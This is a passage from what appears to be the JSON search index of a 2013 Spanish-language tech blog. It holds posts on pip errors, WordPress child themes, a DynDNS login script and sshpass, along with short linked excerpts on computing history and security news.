pip-1.4/setup.py -q bdist_egg --dist-dir /tmp/easy_install-XSmFvr/pip-1.4/egg-dist-tmp-jmeGZW\nwarning: no files found matching \u0026#39;*.html\u0026#39; under directory \u0026#39;docs\u0026#39;\nwarning: no previously-included files matching \u0026#39;*.rst\u0026#39; found under directory \u0026#39;docs/_build\u0026#39;\nno previously-included directories found matching \u0026#39;docs/_build/_sources\u0026#39;\nAdding pip 1.4 to easy-install.pth file\nInstalling pip script to /usr/local/bin\nInstalling pip-2.7 script to /usr/local/bin\n\u003c/code\u003e\u003c/pre\u003e\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eInstalled /usr/local/lib/python2.7/dist-packages/pip-1.4-py2.7.egg\nProcessing dependencies for pip\nFinished processing dependencies for pip\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eComprobamos que se ha solucionado:\u003c/p\u003e","title":"Solucionado el error «DistributionNotFound» al usar pip"},{"content":"Un tema hijo en WordPress es un tema que hereda la funcionalidad de otro, el tema padre, permitiendo modificar el estilo o añadir funcionalidades a éste. Es la forma más sencilla y segura de modificar un tema existente, ya sean cambios grandes o pequeños. Si utilizamos un tema de otros, ya sea gratuito o de pago, crear un tema hijo es una buena idea.\n¿Por qué crear un tema hijo? Porqué en algún momento cambiaremos algo del tema que estamos usando, y en algún momento posterior es posible que haya una actualización de dicho tema. En el mejor de los casos, nos deberemos preocupar de guardar los cambios que hemos hecho en el tema y aplicarlos de nuevo tras la actualización. En el peor, perderemos los cambios que hemos hecho.\nCrear un tema hijo Para tener un tema hijo funcionando, lo único que tenemos que hacer es:\nCrear un directorio con el mismo nombre, añadiendo el sufijo `-child`, en el mismo directorio del tema padre. Ejemplo: `twentytwelve-child` Añadimos el fichero style.css en el directorio recién creado: /* Theme Name: Twenty Twelve Child Theme URI: http://example.com/ Description: Child theme for the Twenty Twelve theme Author: Your name here Author URI: http://example.com/about/ Template: twentytwelve Version: 0.1.0 */ Si sólo queremos hacer pequeñas modificaciones, podemos importar la hoja de estilo del tema padre y añadir los cambios a continuación:\n@import url(\u0026#34;../twentytwelve/style.css\u0026#34;); Activamos el tema desde el panel de administración Para sobreescribir un fichero, basta que tenga el mismo nombre que en el tema padre. De ahí que necesitemos importar el fichero del tema padre si sólo queremos añadir algunos cambios. Una excepción es el fichero functions.php, el cual se carga antes que el del tema hijo, por lo que no será necesario copiar este fichero. Para poder sobrecargar una función del tema padre, éste debe utilizar funciones sobreescribibles, que comprueban si han sido definidas previamente.\nA partir de ahora, podemos llenar el fichero functions.php de nuestro tema hijo con todas esas funciones imprescindibles de sitios como:\n» WordPress Stack Exchange » Cats who code » Smashing Magazine » WordPress Recipes » WordPress Mix » Dig WordPress » WordPress Tutplus » WordPress Code Snippets\n¿Y si ya estoy utilizando un tema hijo? Es posible que ya estemos utilizando un tema hijo. En este caso, podemos crear un tema nieto, sólo que no se hace como hemos hecho para el tema hijo, sino que debe hacerse como si fuese un complemento. Más información en este artículo en wp-code.com.\nReferencias » How to Customize Your WordPress Theme With a Child Theme » Don\u0026rsquo;t edit child themes – use grandchild themes! » WordPress Child Themes » WordPress Pluggable Functions\n","permalink":"http://karpoke.ignaciocano.com/2013/07/13/utilizando-un-tema-hijo-en-wordpress/","summary":"\u003cp\u003eUn \u003ca href=\"http://codex.wordpress.org/Child_Themes\"\u003etema hijo en WordPress\u003c/a\u003e es un tema que hereda la funcionalidad de\notro, el tema padre, permitiendo modificar el estilo o añadir\nfuncionalidades a éste. Es la forma más sencilla y segura de modificar\nun tema existente, ya sean cambios grandes o pequeños. Si utilizamos un\ntema de otros, ya sea gratuito o de pago, crear un tema hijo es una\nbuena idea.\u003c/p\u003e\n\u003ch2 id=\"por-qué-crear-un-tema-hijo\"\u003e¿Por qué crear un tema hijo?\u003c/h2\u003e\n\u003cp\u003ePorqué en algún momento cambiaremos algo del tema que estamos usando, y\nen algún momento posterior es posible que haya una actualización de\ndicho tema. En el mejor de los casos, nos deberemos preocupar de guardar\nlos cambios que hemos hecho en el tema y aplicarlos de nuevo tras la\nactualización. En el peor, perderemos los cambios que hemos hecho.\u003c/p\u003e","title":"Utilizando un tema hijo en WordPress"},{"content":" Computers have come a long way since the early days, when two of the machines could take over a four-story building and weigh up to 250 tons. As early as the 1930s, inventors, engineers and physicists were figuring out ways to use machines to perform complex calculations and processes, employing pioneering methods to achieve their goals. Although some of those techniques and devices are now blissfully obsolete, many early innovators hit upon technologies that are still in use today. These 10 colossal old computers are a testament to the alluring potential of computing and the ingenuity of early computer scientists – as well as a visual demonstration of just how far we’ve come.\n» Will | bestcomputerscienceschools.net\n","permalink":"http://karpoke.ignaciocano.com/2013/07/07/10-colossal-old-computers-that-changed-history/","summary":"\u003cblockquote\u003e\n\u003cp\u003eComputers have come a long way since the early days, when two of the\nmachines could take over a four-story building and weigh up to 250\ntons. As early as the 1930s, inventors, engineers and physicists were\nfiguring out ways to use machines to perform complex calculations and\nprocesses, employing pioneering methods to achieve their goals.\nAlthough some of those techniques and devices are now blissfully\nobsolete, many early innovators hit upon technologies that are still\nin use today. These 10 colossal old computers are a testament to the\nalluring potential of computing and the ingenuity of early computer\nscientists – as well as a visual demonstration of just how far we’ve\ncome.\u003c/p\u003e","title":"10 Colossal Old Computers That Changed History"},{"content":" The Bluebox Security research team – Bluebox Labs – recently discovered a vulnerability in Android’s security model that allows a hacker to modify APK code without breaking an application’s cryptographic signature, to turn any legitimate application into a malicious Trojan, completely unnoticed by the app store, the phone, or the end user. The implications are huge! This vulnerability, around at least since the release of Android 1.6 (codename: ”Donut” ), could affect any Android phone released in the last 4 years1 – or nearly 900 million devices2– and depending on the type of application, a hacker can exploit the vulnerability for anything from data theft to creation of a mobile botnet.\n» Jeff Forristal | bluebox.com\n","permalink":"http://karpoke.ignaciocano.com/2013/07/06/uncovering-android-master-key-that-makes-99-of-devices-vulnerable/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe Bluebox Security research team – Bluebox Labs – recently\ndiscovered a vulnerability in Android’s security model that allows a\nhacker to modify APK code without breaking an application’s\ncryptographic signature, to turn any legitimate application into a\nmalicious Trojan, completely unnoticed by the app store, the phone, or\nthe end user. The implications are huge! This vulnerability, around at\nleast since the release of Android 1.6 (codename: ”Donut” ), could\naffect any Android phone released in the last 4 years1 – or nearly 900\nmillion devices2– and depending on the type of application, a hacker\ncan exploit the vulnerability for anything from data theft to creation\nof a mobile botnet.\u003c/p\u003e","title":"Uncovering android master key that makes 99% of devices vulnerable"},{"content":" La edad de oro de los videojuegos en España (1985 - 1991). EL número de Ordenadores de 8 bits en nuestro país era el suficiente como para crear una industria del videojuego. Jóvenes emprendedores crearían una industria lúdica, basada en el videojuego, que sorprendería en todo el mundo. Esta es la historia de esos programadores, compañías y entorno que nos embelesó en los inicios de la informática.\n» Litos NET | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/30/la-edad-de-oro-de-los-videojuegos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa edad de oro de los videojuegos en España (1985 - 1991). EL número\nde Ordenadores de 8 bits en nuestro país era el suficiente como para\ncrear una industria del videojuego. Jóvenes emprendedores crearían una\nindustria lúdica, basada en el videojuego, que sorprendería en todo el\nmundo. Esta es la historia de esos programadores, compañías y entorno\nque nos embelesó en los inicios de la informática.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/OQb0OCux5V4?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Litos NET | \u003ca href=\"https://www.youtube.com/watch?v=OQb0OCux5V4\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"La edad de Oro de los videojuegos"},{"content":" » code.org | Via Friki Cabrón youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/29/todo-el-mundo-deberia-saber-programar/","summary":"\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/8lp20JFiB4s?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» \u003ca href=\"http://www.code.org/\"\u003ecode.org\u003c/a\u003e | Via Friki Cabrón \u003ca href=\"https://www.youtube.com/watch?v=8lp20JFiB4s\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"Todo el mundo debería saber programar"},{"content":" ”¿Cómo es posible que este montón de metal pueda sustentarse en el aire?” Esa pregunta nos la hemos hecho muchas veces, y aun hoy el ciudadano medio tiende a aceptarlo como artículo de fe. Hay muchas explicaciones en Internet, pero algunas son confusas, otras están equivocadas y otras más nos dejan como estábamos; y reitero lo que ya he dicho en Twitter, ”Brujería” no vale.\n» Arturo Quirantes | naukas.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/16/asi-vuela-un-avion-y-ojala-que-por-fin-se-aclare-el-tema-de-una-vez-por-todas/","summary":"\u003cblockquote\u003e\n\u003cp\u003e”¿Cómo es posible que este montón de metal pueda sustentarse en el\naire?” Esa pregunta nos la hemos hecho muchas veces, y aun hoy el\nciudadano medio tiende a aceptarlo como artículo de fe. Hay muchas\nexplicaciones en Internet, pero algunas son confusas, otras están\nequivocadas y otras más nos dejan como estábamos; y reitero lo que ya\nhe dicho en Twitter, ”Brujería” no vale.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Arturo Quirantes | \u003ca href=\"http://naukas.com/2013/05/20/asi-vuela-un-avion-y-ojala-que-por-fin-se-aclare-el-tema-de-una-vez-por-todas/\"\u003enaukas.com\u003c/a\u003e\u003c/p\u003e","title":"Así vuela un avión, y ojalá que por fin se aclare el tema de una vez por todas"},{"content":" Éranse una vez los años 70, y un lugar denominado Centro de Investigación de Xerox en Palo Alto, California (Xeros PARC) donde se trabajaba en lo que sería la oficina del futuro. Dentro de ese proyecto existían unos ordenadores con capacidades gráficas y ratón que se llamaban ’Alto’ y, a pesar de lo temprano de los tiempos -en términos bit-, también se fabricaban allí las primeras impresoras láser. Tanto los ’Alto’ como las ’printers’ requerían interconexión; ya que aquellos primitivos ordenadores personales –aquellos primeros PCs que por robo intelectual o caprichos del destino pasaron por las nada inocentes manos de Steve Jobs y dieron origen a Apple- debían mandar los archivos para imprimir a las laser, pero también entenderse entre sí. La misión de intercomunicarlos y conseguir que los datos de unas máquinas pasaran a otras; es decir la misión de construir las primeras redes locales, se encomendó a un joven ingeniero de 27 años, especialista en comunicaciones, que se había graduado poco antes en el MIT (Instituto de Tecnología de Masachussets). Su nombre: Robert Metcalfe.\n» Pilar Bernat | zonamovilidad.es\n","permalink":"http://karpoke.ignaciocano.com/2013/06/16/ethernet-cumple-40-anos-bob-metcalfe/","summary":"\u003cblockquote\u003e\n\u003cp\u003eÉranse una vez los años 70, y un lugar denominado Centro de\nInvestigación de Xerox en Palo Alto, California (Xeros PARC) donde se\ntrabajaba en lo que sería la oficina del futuro. Dentro de ese\nproyecto existían unos ordenadores con capacidades gráficas y ratón\nque se llamaban ’Alto’ y, a pesar de lo temprano de los tiempos -en\ntérminos bit-, también se fabricaban allí las primeras impresoras\nláser. Tanto los ’Alto’ como las ’printers’ requerían interconexión;\nya que aquellos primitivos ordenadores personales –aquellos primeros\nPCs que por robo intelectual o caprichos del destino pasaron por las\nnada inocentes manos de Steve Jobs y dieron origen a Apple- debían\nmandar los archivos para imprimir a las laser, pero también entenderse\nentre sí. La misión de intercomunicarlos y conseguir que los datos de\nunas máquinas pasaran a otras; es decir la misión de construir las\nprimeras redes locales, se encomendó a un joven ingeniero de 27 años,\nespecialista en comunicaciones, que se había graduado poco antes en el\nMIT (Instituto de Tecnología de Masachussets). Su nombre: Robert\nMetcalfe.\u003c/p\u003e","title":"Ethernet cumple 40 años: Bob Metcalfe"},{"content":" MDADM (Multiple Device Administrator) es un conjunto de herramientas que son utilizadas en GNU/Linux para la gestión de RAID (Redundant Array of Independent Disks, que se traduce como conjunto redundante de discos independientes) administrado a través de software, distribuido bajo los términos de la Licencia Pública General de GNU versión 2 (GNU/GPLv2).\n» Joel Barrios Dueñas | alcancelibre.org\n","permalink":"http://karpoke.ignaciocano.com/2013/06/16/gestion-de-raid-a-traves-de-mdadm/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMDADM (Multiple Device Administrator) es un conjunto de herramientas\nque son utilizadas en GNU/Linux para la gestión de RAID (Redundant\nArray of Independent Disks, que se traduce como conjunto redundante de\ndiscos independientes) administrado a través de software, distribuido\nbajo los términos de la Licencia Pública General de GNU versión 2\n(GNU/GPLv2).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Joel Barrios Dueñas | \u003ca href=\"http://www.alcancelibre.org/staticpages/index.php/como-mdadm\"\u003ealcancelibre.org\u003c/a\u003e\u003c/p\u003e","title":"Gestión de RAID a través de MDADM"},{"content":" Even though it is the Apple II version written in 6502 assembly language, it was a pleasant experience to dive in the code of that mythical game: As usual there were many fascinating sofware wizardries to discover.\nThe Apple II apparent poor environment for game programming was actually ground to unmatched innovation and creativity : From self-modifying code, in-house bootloader, clever floppy disc format to skewing lookup tables: Prince Of Persia features engineering treasures in every modules.\n» Part I : Introduction » Part II : Bootloader » Part III : Code explained\n» Jordan Mechner | fabiensanglard.net\n","permalink":"http://karpoke.ignaciocano.com/2013/06/15/prince-of-persia-code-review/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEven though it is the Apple II version written in 6502 assembly\nlanguage, it was a pleasant experience to dive in the code of that\nmythical game: As usual there were many fascinating sofware wizardries\nto discover.\u003c/p\u003e\n\u003cp\u003eThe Apple II apparent poor environment for game programming was\nactually ground to unmatched innovation and creativity : From\nself-modifying code, in-house bootloader, clever floppy disc format to\nskewing lookup tables: Prince Of Persia features engineering treasures\nin every modules.\u003c/p\u003e","title":"Prince of persia code review"},{"content":" Everything described here is based on a project I completed in early 2011, which was originally started several years earlier. While attending CanSecWest in 2009, Anibal Sacco and Alfredo Ortega from Core Security did a presentation on ’Persistent BIOS Infection’ where they demonstrated how it was possible to patch the BIOS to do some nasty/awesome things. Their Phrack write-up is here: http://www.phrack.com/issues.html?issue=66\u0026amp;id=7. At the time this seemed really cool, but I never ended up getting the chance to try it out. A year later I needed to do a term project for school, so I decided to revisit BIOS hacking, and implement some of it myself.\n» Wesley Wineberg | exfiltrated.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/14/bios-based-rootkits/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEverything described here is based on a project I completed in early\n2011, which was originally started several years earlier. While\nattending CanSecWest in 2009, Anibal Sacco and Alfredo Ortega from\nCore Security did a presentation on ’Persistent BIOS Infection’ where\nthey demonstrated how it was possible to patch the BIOS to do some\nnasty/awesome things. Their Phrack write-up is here:\n\u003ca href=\"http://www.phrack.com/issues.html?issue=66\u0026amp;id=7\"\u003ehttp://www.phrack.com/issues.html?issue=66\u0026amp;id=7\u003c/a\u003e. At the time this\nseemed really cool, but I never ended up getting the chance to try it\nout. A year later I needed to do a term project for school, so I\ndecided to revisit BIOS hacking, and implement some of it myself.\u003c/p\u003e","title":"BIOS Based Rootkits"},{"content":"Hace un par de semanas, DynDNS cambió su política de uso de las cuentas gratuitas para incluir una cláusula por la cual es necesario hacer mínimo un login al mes si no se quieren perder los dominios que tengamos:\nStarting now, if you would like to maintain your free Dyn account, you must log into your account once a month. Failure to do so will result in expiration and loss of your hostname. This activity helps us eliminate hostnames that are no longer needed and/or dormant. Note that an update client will not suffice for this monthly login.\nEl siguiente script permite iniciar sesión haciendo uso de la librería mechanize para Python:\n#!/usr/bin/env python import mechanize import cookielib LOGIN_URL = \u0026#34;https://account.dyn.com/entrance/\u0026#34; USERNAME = \u0026#34;username\u0026#34; PASSWORD = \u0026#34;password\u0026#34; # Browser br = mechanize.Browser() # Cookie Jar cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) # Browser options br.set_handle_equiv(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) # Follows refresh 0 but not hangs on refresh \u0026gt; 0 br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) # User-Agent (this is cheating, ok?) br.addheaders = [(\u0026#39;User-agent\u0026#39;, \u0026#39;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1\u0026#39;)] # Open some site, let\u0026#39;s pick a random one, the first that pops in mind: r = br.open(LOGIN_URL) html = r.read() # Select the second (index one) form br.select_form(nr=1) br.form[\u0026#34;username\u0026#34;] = USERNAME br.form[\u0026#34;password\u0026#34;] = PASSWORD br.submit() if br.response().read().find(USERNAME) \u0026gt;= 0: print(\u0026#34;OK\u0026#34;) else: print(\u0026#34;KO\u0026#34;) Actualización a 22 de septiembre de 2013 Actualizada la URL en la que encontraremos el formulario de login.\nReferencias » Emulating a Browser in Python with mechanize\n","permalink":"http://karpoke.ignaciocano.com/2013/06/10/iniciar-sesion-en-dyndns-desde-el-terminal/","summary":"\u003cp\u003eHace un par de semanas, DynDNS cambió su política de uso de las cuentas\ngratuitas para incluir una cláusula por la cual es necesario hacer\nmínimo un login al mes si no se quieren perder los dominios que\ntengamos:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eStarting now, if you would like to maintain your free Dyn account, you\nmust log into your account once a month. Failure to do so will result\nin expiration and loss of your hostname. This activity helps us\neliminate hostnames that are no longer needed and/or dormant. Note\nthat an update client will not suffice for this monthly login.\u003c/p\u003e","title":"Iniciar sesión en DynDNS desde el terminal"},{"content":" Recently, an Android application came to us for analysis. At a glance, we knew this one was special. All strings in the DEX file were encrypted, and the code was obfuscated.\nThe file turned out to be a multi-functional Trojan, capable of the following: sending SMS to premium-rate numbers; downloading other malware programs, installing them on the infected device and/or sending them further via Bluetooth; and remotely performing commands in the console. Now, Kaspersky Lab’s products detect this malicious program as Backdoor.AndroidOS.Obad.a\n» Roman Unuchek | securelist.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/09/the-most-sophisticated-android-trojan/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRecently, an Android application came to us for analysis. At a glance,\nwe knew this one was special. All strings in the DEX file were\nencrypted, and the code was obfuscated.\u003c/p\u003e\n\u003cp\u003eThe file turned out to be a multi-functional Trojan, capable of the\nfollowing: sending SMS to premium-rate numbers; downloading other\nmalware programs, installing them on the infected device and/or\nsending them further via Bluetooth; and remotely performing commands\nin the console. Now, Kaspersky Lab’s products detect this malicious\nprogram as Backdoor.AndroidOS.Obad.a\u003c/p\u003e","title":"The most sophisticated Android Trojan"},{"content":"sshpass es un programa que nos permite iniciar sesión en un servidor SSH de forma no interactiva y sin utilizar claves, para lo que deberemos proporcionar la contraseña como argumento del programa.\nPara conectar a un servidor SSH, es preferible utilizar claves, además de tener en cuenta otros sistemas de seguridad, como la autenticación en dos pasos, pero puede haber escenarios en los que sshpass sea una alternativa a considerar.\nSu uso es sencillo:\n$ sshpass -p password ssh example.com El hecho de que la contraseña se escriba directamente en el terminal, además de que es posible que quede escrita en el historial, podría hacer que fuese visible al ejecutar otro usuario el comando ps. Sin embargo, sshpass se encarga de sustituir la contraseña por zetas:\n$ ps a | grep sshpass 18998 pts/6 S+ 0:00 sshpass -p zzzzzzzz ssh example.com Referencias » sshpass: Login To SSH Server / Provide SSH Password Using A Shell Script\n","permalink":"http://karpoke.ignaciocano.com/2013/06/09/conectarse-por-ssh-utilizando-sshpass/","summary":"\u003cp\u003e\u003ccode\u003esshpass\u003c/code\u003e es un programa que nos permite iniciar sesión en un servidor\nSSH de forma no interactiva y sin utilizar claves, para lo que deberemos\nproporcionar la contraseña como argumento del programa.\u003c/p\u003e\n\u003cp\u003ePara conectar a un servidor SSH, es preferible \u003ca href=\"/2011/03/03/conectarse-por-ssh-solo-usando-la-clave/\"\u003eutilizar claves\u003c/a\u003e,\nademás de tener en cuenta otros sistemas de seguridad, como la\n\u003ca href=\"/2011/08/05/servicio-de-ssh-con-sistema-de-verificacion-en-dos-pasos-de-google-en-ubuntu-natty-narwhal/\"\u003eautenticación en dos pasos\u003c/a\u003e, pero puede haber escenarios en los que\n\u003ccode\u003esshpass\u003c/code\u003e sea una alternativa a considerar.\u003c/p\u003e\n\u003cp\u003eSu uso es sencillo:\u003c/p\u003e","title":"Conectarse por SSH utilizando sshpass"},{"content":" I dumped the ROM of a Tamagotchi using the code execution ability I posted previously. I wrote 6502 code that dumped each byte of the memory space of the Tamagotchi, and output it over port A (which is usually the Tamagotchi button input) via SPI.\n» Natalie Silvanovich | kwartzlab.ca\n","permalink":"http://karpoke.ignaciocano.com/2013/06/08/first-glimpse-into-the-soul-of-a-tamagotchi/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI dumped the ROM of a Tamagotchi using the code execution ability I\nposted previously. I wrote 6502 code that dumped each byte of the\nmemory space of the Tamagotchi, and output it over port A (which is\nusually the Tamagotchi button input) via SPI.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Natalie Silvanovich | \u003ca href=\"http://www.kwartzlab.ca/2013/05/first-glimpse-soul-tamagotchi/\"\u003ekwartzlab.ca\u003c/a\u003e\u003c/p\u003e","title":"First Glimpse into the Soul of a Tamagotchi"},{"content":" In March, readers followed along as Nate Anderson, Ars deputy editor and a self-admitted newbie to password cracking, downloaded a list of more than 16,000 cryptographically hashed passcodes. Within a few hours, he deciphered almost half of them. The moral of the story: if a reporter with zero training in the ancient art of password cracking can achieve such results, imagine what more seasoned attackers can do.\nImagine no more. We asked three cracking experts to attack the same list Anderson targeted and recount the results in all their color and technical detail Iron Chef style. The results, to say the least, were eye opening because they show how quickly even long passwords with letters, numbers, and symbols can be discovered.\n» Dan Goodin | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/08/how-crackers-ransack-passwords-like-qeadzcwrsfxv1331/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn March, readers followed along as Nate Anderson, Ars deputy editor\nand a self-admitted newbie to password cracking, downloaded a list of\nmore than 16,000 cryptographically hashed passcodes. Within a few\nhours, he deciphered almost half of them. The moral of the story: if a\nreporter with zero training in the ancient art of password cracking\ncan achieve such results, imagine what more seasoned attackers can do.\u003c/p\u003e\n\u003cp\u003eImagine no more. We asked three cracking experts to attack the same\nlist Anderson targeted and recount the results in all their color and\ntechnical detail Iron Chef style. The results, to say the least, were\neye opening because they show how quickly even long passwords with\nletters, numbers, and symbols can be discovered.\u003c/p\u003e","title":"How crackers ransack passwords like ’qeadzcwrsfxv1331’"},{"content":" No cabe duda de que en los últimos años hemos avanzado mucho en Seguridad de la Información. Poco a poco, entre las empresas comienza a implantarse la idea de que la seguridad es un ámbito al que hay que prestar una atención específica e independiente, más allá de lo que muchos consideran ”los informáticos”. Sin embargo, si no es bueno caer en el catastrofismo, no debemos ser demasiado indulgentes: queda mucho camino por recorrer y los avances no siempre se producen a la velocidad a la que, afortunadamente para los delincuentes, serían recomendables o deseables. A diario se producen noticias de empresas u organizaciones con una fuerte inversión en seguridad cuya infraestructura tecnológica es vulnerada, lo que da una idea del desequilibrio de fuerzas existente.\nEn esta línea, aun persisten muchos errores y creencias que podemos identificar como los diez errores típicos de las PYMEs en materia de seguridad y que marcan el camino a seguir estos próximos años.\n» Manuel Benet | securityartwork.es\n","permalink":"http://karpoke.ignaciocano.com/2013/06/08/los-10-errores-tipicos-de-una-pyme-en-materia-de-seguridad/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNo cabe duda de que en los últimos años hemos avanzado mucho en\nSeguridad de la Información. Poco a poco, entre las empresas comienza\na implantarse la idea de que la seguridad es un ámbito al que hay que\nprestar una atención específica e independiente, más allá de lo que\nmuchos consideran ”los informáticos”. Sin embargo, si no es bueno caer\nen el catastrofismo, no debemos ser demasiado indulgentes: queda mucho\ncamino por recorrer y los avances no siempre se producen a la\nvelocidad a la que, afortunadamente para los delincuentes, serían\nrecomendables o deseables. A diario se producen noticias de empresas u\norganizaciones con una fuerte inversión en seguridad cuya\ninfraestructura tecnológica es vulnerada, lo que da una idea del\ndesequilibrio de fuerzas existente.\u003c/p\u003e","title":"Los 10 errores típicos de una PYME en materia de seguridad"},{"content":" This article describes linux booting process in detail, what are the steps involved, which scripts run, what configuration files are read and their order, from turning on the system till getting the login prompt. Although this article projects a general view of booting a Linux system, but some configuration files and commands can be Red Hat specific. You can also download linux boot process pdf version for future reference.\n» Raghu | expertslogin.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/08/stage-by-stage-boot-process-of-linux-in-detail/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis article describes linux booting process in detail, what are the\nsteps involved, which scripts run, what configuration files are read\nand their order, from turning on the system till getting the login\nprompt. Although this article projects a general view of booting a\nLinux system, but some configuration files and commands can be Red Hat\nspecific. You can also download linux boot process pdf version for\nfuture reference.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Raghu | \u003ca href=\"http://www.expertslogin.com/booting/boot-process-of-linux-in-detail/\"\u003eexpertslogin.com\u003c/a\u003e\u003c/p\u003e","title":"Stage By Stage Boot Process Of Linux In Detail"},{"content":" The algorithm converts pixels from a source image into squares in the Tetris playfield, one row at a time from the bottom up. To generate an individual square, the algorithm assembles a structure consisting of a rectangular region fully supported by a single square protruding from the bottom. When the rectangular region is completed, its rows are cleared, leaving behind the protruding square. Three examples of the process appear below\n» Michael Birken | meatfighter.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/05/tetris-printer-algorithm/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe algorithm converts pixels from a source image into squares in the\nTetris playfield, one row at a time from the bottom up. To generate an\nindividual square, the algorithm assembles a structure consisting of a\nrectangular region fully supported by a single square protruding from\nthe bottom. When the rectangular region is completed, its rows are\ncleared, leaving behind the protruding square. Three examples of the\nprocess appear below\u003c/p\u003e","title":"Tetris Printer Algorithm"},{"content":" In the mid-1980s, O’Reilly (aka O’Reilly \u0026amp; Associates) was selling short books on Unix topics via mail order. These books, known as ”Nutshell Handbooks,” were held together by staples, and had plain brown covers. Over time, Tim O’Reilly decided that he wanted to sell the books through brick-and-mortar bookstores, and hired a graphic designer to create new book covers. Those covers were used for the first two titles that were sold into bookstores, but Tim wasn’t satisfied with the design.\n» Edie Freedman | animals.oreilly.com\n","permalink":"http://karpoke.ignaciocano.com/2013/06/01/a-short-history-of-the-oreilly-animals/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn the mid-1980s, O’Reilly (aka O’Reilly \u0026amp; Associates) was selling\nshort books on Unix topics via mail order. These books, known as\n”Nutshell Handbooks,” were held together by staples, and had plain\nbrown covers. Over time, Tim O’Reilly decided that he wanted to sell\nthe books through brick-and-mortar bookstores, and hired a graphic\ndesigner to create new book covers. Those covers were used for the\nfirst two titles that were sold into bookstores, but Tim wasn’t\nsatisfied with the design.\u003c/p\u003e","title":"A Short History of the O’Reilly Animals"},{"content":" Se dice que son necesarias 10.000 horas de trabajo de programación para alcanzar el nivel de experto, pero una vez llegado a él, ¿cuál es la evolución? ¿Se mantiene? ¿Continúa mejorando? ¿Retrocede?\n» Juan Palacio | navegapolis.com\n","permalink":"http://karpoke.ignaciocano.com/2013/05/13/influye-la-edad-en-la-calidad-como-programador/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSe dice que son necesarias 10.000 horas de trabajo de programación\npara alcanzar el nivel de experto, pero una vez llegado a él, ¿cuál es\nla evolución? ¿Se mantiene? ¿Continúa mejorando? ¿Retrocede?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Juan Palacio | \u003ca href=\"http://navegapolis.com/index.php/93-programadores-y-edad\"\u003enavegapolis.com\u003c/a\u003e\u003c/p\u003e","title":"¿Influye la edad en la calidad como programador?"},{"content":" Cuenta la anécdota que un día de la primavera de 1855 el físico inglés Michael Faraday daba una conferencia pública en la que mostraba sus pioneros experimentos sobre la electricidad y el magnetismo. Entre la audiencia se encontraba William Gladstone, entonces Ministro de Hacienda y futuro Primer Ministro. Gladstone se levantó y le espetó al investigador: ”todo esto es muy bonito, ¿pero alguna vez le encontraremos una aplicación práctica?”, a lo que Faraday respondió: ”no se preocupe, algún día el gobierno cobrará impuestos sobre esto”.\n» principiamarsupia.com\n","permalink":"http://karpoke.ignaciocano.com/2013/05/04/como-4-ecuaciones-cambiaron-el-mundo/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCuenta la anécdota que un día de la primavera de 1855 el físico inglés\nMichael Faraday daba una conferencia pública en la que mostraba sus\npioneros experimentos sobre la electricidad y el magnetismo. Entre la\naudiencia se encontraba William Gladstone, entonces Ministro de\nHacienda y futuro Primer Ministro. Gladstone se levantó y le espetó al\ninvestigador: ”todo esto es muy bonito, ¿pero alguna vez le\nencontraremos una aplicación práctica?”, a lo que Faraday respondió:\n”no se preocupe, algún día el gobierno cobrará impuestos sobre 